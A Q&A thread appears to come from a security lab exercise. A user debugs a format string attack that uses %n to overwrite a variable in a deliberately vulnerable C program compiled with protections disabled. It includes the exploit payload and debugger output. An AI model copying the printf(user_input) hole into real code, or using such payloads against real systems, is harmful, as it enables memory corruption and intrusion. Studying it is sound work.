# Format Strings - Failed to write to any address

Tags: c, string, format

1.binary
source code

```
#include<stdio.h>
void main() {
    char format[128];
    int arg1 = 1, arg2 = 0x88888888, arg3 = -1;
    char arg4[10] = "ABCD";
    scanf("%s", format);
    printf(format, arg1, arg2, arg3, arg4);
    printf("\n");
}
```

compile

```
echo 0 > /proc/sys/kernel/randomize_va_space
gcc -m32 -g -fno-stack-protector -no-pie -o fmt fmt.c
```

## Q

I tried typing the following, modifying the value of arg2：

```
python2 -c 'print("\x58\xcf\xff\xff%08x%08x%012d"+"%15$n")' > text
```

I'm sure the offset 15 is correct and  (0xffffcf84 —▸ 0xffffcf58 ◂— 0x88888888) also appears below, but I don't know why I didn't successfully overwrite arg2=0x20.

```
pwndbg> r < text
...
pwndbg> stack 20
00:0000│ esp  0xffffcf50 —▸ 0xffffcf84 —▸ 0xffffcf58 ◂— 0x88888888
01:0004│      0xffffcf54 ◂— 0x1
02:0008│      0xffffcf58 ◂— 0x88888888
03:000c│      0xffffcf5c ◂— 0xffffffff
04:0010│      0xffffcf60 —▸ 0xffffcf7a ◂— 'ABCD'
05:0014│      0xffffcf64 —▸ 0xffffcf84 —▸ 0xffffcf58 ◂— 0x88888888
06:0018│      0xffffcf68 —▸ 0x80481fc ◂— cmp    byte ptr [eax], al /* '8' */
07:001c│      0xffffcf6c —▸ 0xffffcfd8 —▸ 0xf7e0ddc8 ◂— jbe    0xf7e0ddf5 /* 'v+' */
08:0020│      0xffffcf70 —▸ 0xf7ffda74 —▸ 0xf7fd3470 —▸ 0xf7ffd918 ◂— 0x0
09:0024│      0xffffcf74 ◂— 0x1
0a:0028│      0xffffcf78 ◂— 0x424134a0
0b:002c│      0xffffcf7c ◂— 0x4443 /* 'CD' */
0c:0030│      0xffffcf80 ◂— 0x0
0d:0034│ eax  0xffffcf84 —▸ 0xffffcf58 ◂— 0x88888888    //here
0e:0038│      0xffffcf88 ◂— 0x78383025 ('%08x')
... ↓
10:0040│      0xffffcf90 ◂— '%012d%15$n'
11:0044│      0xffffcf94 ◂— 'd%15$n'
12:0048│      0xffffcf98 ◂— 0x6e24 /* '$n' */
13:004c│      0xffffcf9c —▸ 0xf7e9179b (handle_intel+107) ◂— add    esp, 0x10
pwndbg> c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xf7e42bb9 in printf_positional (s=s@entry=0xf7fb4d60 <_IO_2_1_stdout_>, format=format@entry=0xffffcf84 "X\317\377\377%08x%08x%01"..., readonly_format=readonly_format@entry=0, ap=<optimized out>, ap_savep=0xffffcaec, done=32, nspecs_done=3, lead_str_end=0xffffcf88 "%08x%08x%012d%1"..., work_buffer=0xffffcb28 "\340\207\001", save_errno=0, grouping=0x0, thousands_sep=0xf7f5c8f2 "") at vfprintf.c:2022
2022    vfprintf.c: No such file or directory.
```

1.I checked that the input data in memory is the same as what I constructed

```
pwndbg> x/30cb 0xffffcf84
0xffffcf84: 88 'X'  -49 '\317'  -1 '\377'   -1 '\377'   37 '%'  48 '0'  56 '8'  120 'x'
0xffffcf8c: 37 '%'  48 '0'  56 '8'  120 'x' 37 '%'  48 '0'  49 '1'  50 '2'
0xffffcf94: 100 'd' 37 '%'  49 '1'  53 '5'  36 '$'  110 'n' 0 '\000'    0 '\000'
0xffffcf9c: -101 '\233' 23 '\027'   -23 '\351'  -9 '\367'   -50 '\316'  -49 '\317'
```

2.I tried google printf_positional, but it was not purposeful because I was not sure where the failure point was. I tried to test and construct other demos, guessing that the problem lies in the constructed data.

```
Program received signal SIGSEGV, Segmentation fault.
0xf7e42bb9 in printf_positional ...
```

Comment: If you are entering the line of text shown that begins with `python2 ...` etc than `scanf` will stop scanning at the first space. The `format` string consequently has no format specifiers. I might be being a bit dense (what has `python2` got to do with it?), but are you trying to "play tricks"? It's always a bad idea to use a user-specified format string.

Comment: @WeatherVane I would assume, Python is only used to create the input string `"\x58\xcf\xff\xff%08x%08x%012d"+"%15$n"` to be passed as `stdin`

Comment: @Gerhardh thanks but still mystified what the code is supposed to do, or *why*. How is the output of `printf` supposed to overwrite `arg2`? The input string doesn't overflow `format` either.

Comment: @WeatherVane yes, what is intented to happen and why is the big secret. ;)

Comment: @WeatherVane arg2 is just the knowledge I learned to use format string vulnerabilities to achieve arbitrary writing through this, overwrite is my expression error. My purpose is to modify arg2 by entering "\x58\xcf\xff\xff%08x%08x%012d%15$n“.

Comment: The $ is a Posix extension, and Miscrosoft says (about Visual C) "The `n` specifier is **disabled by default**; for information see the important security note."

Comment: @WeatherVane thanks, but my environment is ubuntu16.04. I have tested other demos that support `n` specifier.

Comment: MS also doesn't say that the size given for `n` is an offset, but *the size of the integer pointed at*.

Comment: ...OTOH if you are using the Posix extension `$` to specify which argument to use, there isn't a 15th argument, so the behaviour is undefined. [Linux spec](https://man7.org/linux/man-pages/man3/printf.3.html) also says: *If the style using '$' is used, it must be used throughout for all conversions taking an argument and all width and precision arguments.*

Comment: @WeatherVane thanks. you are right, I have verified it successfully. I was stupid. I calculated the offset without actually counting it. Falling into the trap of thinking. Thanks again:）

Comment: There is no guarantee about what order the compiler arranges the variables in memory.